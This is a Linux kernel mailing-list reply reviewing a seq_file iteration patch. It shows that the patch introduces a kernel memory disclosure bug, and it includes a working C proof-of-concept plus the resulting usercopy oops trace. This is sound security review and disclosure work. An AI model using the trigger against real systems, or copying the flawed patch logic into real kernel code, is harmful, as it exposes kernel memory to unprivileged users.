Re: [PATCH resend*3] VFS: simplify seq_file iteration code and interface

From: Jann Horn
Date: Fri Jul 06 2018 - 20:56:52 EST


On Sat, Jul 7, 2018 at 2:11 AM NeilBrown <neilb@xxxxxxxx> wrote:
>
>
> The documentation for seq_file suggests that it is necessary to be
> able to move the iterator to a given offset, however that is not the
> case. If the iterator is stored in the private data and is stable
> from one read() syscall to the next, it is only necessary to support
> first/next interactions. Implementing this in a client is a little
> clumsy.
> - if ->start() is given a pos of zero, it should go to start of
> sequence.
> - if ->start() is given the name pos that was given to the most recent
> next() or start(), it should restore the iterator to state just
> before that last call
> - if ->start is given another number, it should set the iterator one
> beyond the start just before the last ->start or ->next call.
>
>
> Also, the documentation says that the implementation can interpret the
> pos however it likes (other than zero meaning start), but seq_file
> increments the pos sometimes which does impose on the implementation.
>
> This patch simplifies the interface for first/next iteration and
> simplifies the code, while maintaining complete backward
> compatability. Now:
>
> - if ->start() is given a pos of zero, it should return an iterator
> placed at the start of the sequence
> - if ->start() is given a non-zero pos, it should return the iterator
> in the same state it was after the last ->start or ->next.
>
> This is particularly useful for interators which walk the multiple
> chains in a hash table, e.g. using rhashtable_walk*. See
> fs/gfs2/glock.c and drivers/staging/lustre/lustre/llite/vvp_dev.c
>
> A large part of achieving this is to *always* call ->next after ->show
> has successfully stored all of an entry in the buffer. Never just
> increment the index instead.
> Also:
> - always pass &m->index to ->start() and ->next(), never a temp
> variable
> - don't clear ->from when ->count is zero, as ->from is dead when
> ->count is zero.
>
>
> Some ->next functions do not increment *pos when they return NULL.
> To maintain compatability with this, we still need to increment
> m->index in one place, if ->next didn't increment it.
> Note that such ->next functions are buggy and should be fixed.
> A simple demonstration is
> dd if=/proc/swaps bs=1000 skip=1
> Choose any block size larger than the size of /proc/swaps.
> This will always show the whole last line of /proc/swaps.
>
> This patch doesn't work around buggy next() functions for this case.
>
> Acked-by: Jonathan Corbet <corbet@xxxxxxx> (For the docs part)
> Signed-off-by: NeilBrown <neilb@xxxxxxxx>
> ---
>
> Still hoping someone might apply this, or at least review it,
> or maybe just tell me how insane it is - anything but silence :-(
>
> NeilBrown
[...]
> diff --git a/fs/seq_file.c b/fs/seq_file.c
> index 4cc090b50cc5..fd82585ab50f 100644
> --- a/fs/seq_file.c
> +++ b/fs/seq_file.c
[...]
> @@ -160,7 +154,6 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
> {
> struct seq_file *m = file->private_data;
> size_t copied = 0;
> - loff_t pos;
> size_t n;
> void *p;
> int err = 0;
> @@ -223,16 +216,11 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
> size -= n;
> buf += n;
> copied += n;
> - if (!m->count) {
> - m->from = 0;
> - m->index++;
> - }
> if (!size)
> goto Done;
> }
> /* we need at least one record in buffer */
> - pos = m->index;
> - p = m->op->start(m, &pos);
> + p = m->op->start(m, &m->index);
> while (1) {
> err = PTR_ERR(p);
> if (!p || IS_ERR(p))
> @@ -243,8 +231,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
> if (unlikely(err))
> m->count = 0;
> if (unlikely(!m->count)) {
> - p = m->op->next(m, p, &pos);
> - m->index = pos;
> + p = m->op->next(m, p, &m->index);
> continue;
> }
> if (m->count < m->size)
> @@ -256,29 +243,33 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
> if (!m->buf)
> goto Enomem;
> m->version = 0;
> - pos = m->index;
> - p = m->op->start(m, &pos);
> + p = m->op->start(m, &m->index);
> }
> m->op->stop(m, p);
> m->count = 0;
> goto Done;
> Fill:
> /* they want more? let's try to get some more */
> - while (m->count < size) {
> + while (1) {
> size_t offs = m->count;
> - loff_t next = pos;
> - p = m->op->next(m, p, &next);
> + loff_t pos = m->index;
> +
> + p = m->op->next(m, p, &m->index);
> + if (pos == m->index)
> + /* Buggy ->next function */
> + m->index++;
> if (!p || IS_ERR(p)) {
> err = PTR_ERR(p);
> break;
> }
> + if (m->count >= size)
> + break;
> err = m->op->show(m, p);
> if (seq_has_overflowed(m) || err) {
> m->count = offs;
> if (likely(err <= 0))
> break;
> }
> - pos = next;
> }
> m->op->stop(m, p);
> n = min(m->count, size);
> @@ -287,11 +278,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
> goto Efault;
> copied += n;
> m->count -= n;
> - if (m->count)
> - m->from = n;
> - else
> - pos++;
> - m->index = pos;
> + m->from = n;

This patch introduces a kernel memory disclosure bug when something
like the following sequence of events happens (starting from a freshly
opened seq file):

1. read(seq_fd, buf, 2000): sets m->from=2000, m->count=100
2. create a buffer broken_buf which consists of 1000 bytes writable
memory followed by unmapped memory
3. read(seq_fd, broken_buf, 3100):
- flushes buffered data to userspace, result: m->from=2100, m->count=0
- accumulates new data, result: m->from=2100, m->count=3050
- tries to copy new data to userspace, but fails ("goto Efault")
4. read(seq_fd, buf, 4096): does copy_to_user(buf, m->buf + m->from, n)

I wrote the following crasher to test this:

==================
#include <sys/mman.h>
#include <err.h>
#include <errno.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>

int main(void) {
// dummy mappings: make sure /proc/self/smaps has lots to say
for (int i=0; i<50; i++) {
void *mapping = mmap(NULL, 0x2000, PROT_READ,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
if (mprotect(mapping, 0x1000, PROT_NONE))
err(1, "mprotect");
}

int fd = open("/proc/self/smaps", O_RDONLY);
if (fd == -1)
err(1, "open");
char buf[0x1000];

// set m->from = 2000, m->count ~= 100
int first_res = read(fd, buf, 2000);
if (first_res != 2000)
errx(1, "first res");

// broken_buf: 1000 bytes writable memory followed by unmapped memory
char *broken_buf_base = mmap(NULL, 0x2000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (broken_buf_base == MAP_FAILED)
err(1, "mmap");
if (mprotect(broken_buf_base+0x1000, 0x1000, PROT_NONE))
err(1, "mprotect");
char *broken_buf = broken_buf_base+0x1000-1000;

// set m->from = 2000, m->count ~= 3050
int second_res = read(fd, broken_buf, 3100);
printf("second read: %d\n", second_res);
if (second_res <= 0 || second_res > 1000)
errx(1, "second read didn't partly succeed as expected");

// trigger OOB read
read(fd, buf, 0x1000);
}
==================

Running this against a linux-next build with
CONFIG_HARDENED_USERCOPY=y, I reliably get kernel oopses that look as
follows:

==================
[ 240.215442] usercopy: Kernel memory exposure attempt detected from
SLAB object 'kmalloc-4096' (offset 2663, size 2613)!
[ 240.215475] ------------[ cut here ]------------
[ 240.215478] kernel BUG at mm/usercopy.c:100!
[ 240.215491] invalid opcode: 0000 [#1] SMP KASAN PTI
[ 240.215500] CPU: 1 PID: 968 Comm: seq_read_trigge Not tainted
4.18.0-rc3-next-20180706 #37
[ 240.215506] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.10.2-1 04/01/2014
[ 240.215540] RIP: 0010:usercopy_abort+0x69/0x80
[ 240.215544] Code: 44 d0 53 48 c7 c0 60 98 ae 92 51 48 c7 c6 e0 97
ae 92 41 53 48 89 f9 48 0f 45 f0 4c 89 d2 48 c7 c7 80 99 ae 92 e8 e0
2d dc ff <0f> 0b 49 c7 c1 20 97 ae 92 4d 89 cb 4d 89 c8 eb a5 66 0f 1f
44 00
[ 240.215615] RSP: 0018:ffff8801d0a47bf8 EFLAGS: 00010286
[ 240.215621] RAX: 000000000000006b RBX: 0000000000000a35 RCX: ffffffff911c883e
[ 240.215627] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff8801ec3261cc
[ 240.215632] RBP: ffffea00079e2800 R08: ffffed003d864f29 R09: ffffed003d864f29
[ 240.215637] R10: ffffffff92ae9820 R11: ffffed003d864f28 R12: 0000000000000a35
[ 240.215643] R13: 0000000000000001 R14: ffff8801e78a1ddc R15: ffffea00079e2800
[ 240.215649] FS: 00007f820d397700(0000) GS:ffff8801ec300000(0000)
knlGS:0000000000000000
[ 240.215655] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 240.215660] CR2: 00007f820cf4f4c4 CR3: 00000001e7868003 CR4: 00000000001606e0
[ 240.215668] Call Trace:
[ 240.215680] __check_heap_object+0xb3/0xc0
[ 240.215691] __check_object_size+0xdc/0x240
[ 240.215702] ? check_stack_object+0x21/0x60
[ 240.215722] seq_read+0x3d8/0x6a0
[ 240.215740] ? ldsem_up_read+0x13/0x40
[ 240.215750] __vfs_read+0xc4/0x370
[ 240.215758] ? __x64_sys_copy_file_range+0x2d0/0x2d0
[ 240.215768] ? vma_compute_subtree_gap+0x95/0xc0
[ 240.215775] ? vma_gap_callbacks_rotate+0x37/0x50
[ 240.215785] ? fsnotify+0x895/0x8e0
[ 240.215794] ? fsnotify+0x895/0x8e0
[ 240.215806] ? __fsnotify_inode_delete+0x20/0x20
[ 240.215816] vfs_read+0xa5/0x190
[ 240.215823] ksys_read+0xa1/0x120
[ 240.215830] ? kernel_write+0xa0/0xa0
[ 240.215847] ? mm_fault_error+0x1b0/0x1b0
[ 240.215858] do_syscall_64+0x73/0x160
[ 240.215874] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 240.215881] RIP: 0033:0x7f820cecf700
[ 240.215885] Code: b6 fe ff ff 48 8d 3d 87 be 08 00 48 83 ec 08 e8
06 db 01 00 66 0f 1f 44 00 00 83 3d 49 30 2c 00 00 75 10 b8 00 00 00
00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 de 9b 01 00 48 89
04 24
[ 240.215955] RSP: 002b:00007ffffbcb56a8 EFLAGS: 00000246 ORIG_RAX:
0000000000000000
[ 240.215962] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f820cecf700
[ 240.215967] RDX: 0000000000001000 RSI: 00007ffffbcb56b0 RDI: 0000000000000003
[ 240.215972] RBP: 00007ffffbcb66e0 R08: 0000000000000001 R09: 0000000000000011
[ 240.215977] R10: 0000000000000064 R11: 0000000000000246 R12: 0000558430e72730
[ 240.215982] R13: 00007ffffbcb67c0 R14: 0000000000000000 R15: 0000000000000000
[ 240.215988] Modules linked in:
[ 240.215996] ---[ end trace a76025513bde017a ]---
[ 240.216004] RIP: 0010:usercopy_abort+0x69/0x80
[ 240.216007] Code: 44 d0 53 48 c7 c0 60 98 ae 92 51 48 c7 c6 e0 97
ae 92 41 53 48 89 f9 48 0f 45 f0 4c 89 d2 48 c7 c7 80 99 ae 92 e8 e0
2d dc ff <0f> 0b 49 c7 c1 20 97 ae 92 4d 89 cb 4d 89 c8 eb a5 66 0f 1f
44 00
[ 240.216076] RSP: 0018:ffff8801d0a47bf8 EFLAGS: 00010286
[ 240.216082] RAX: 000000000000006b RBX: 0000000000000a35 RCX: ffffffff911c883e
[ 240.216087] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff8801ec3261cc
[ 240.216092] RBP: ffffea00079e2800 R08: ffffed003d864f29 R09: ffffed003d864f29
[ 240.216098] R10: ffffffff92ae9820 R11: ffffed003d864f28 R12: 0000000000000a35
[ 240.216103] R13: 0000000000000001 R14: ffff8801e78a1ddc R15: ffffea00079e2800
[ 240.216109] FS: 00007f820d397700(0000) GS:ffff8801ec300000(0000)
knlGS:0000000000000000
[ 240.216114] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 240.216119] CR2: 00007f820cf4f4c4 CR3: 00000001e7868003 CR4: 00000000001606e0
==================

(I first started staring at this code because Kees pointed me to
https://syzkaller.appspot.com/bug?extid=4b712dce5cbce6700f27 , but I
think the case I found doesn't quite match what syzcaller is saying?)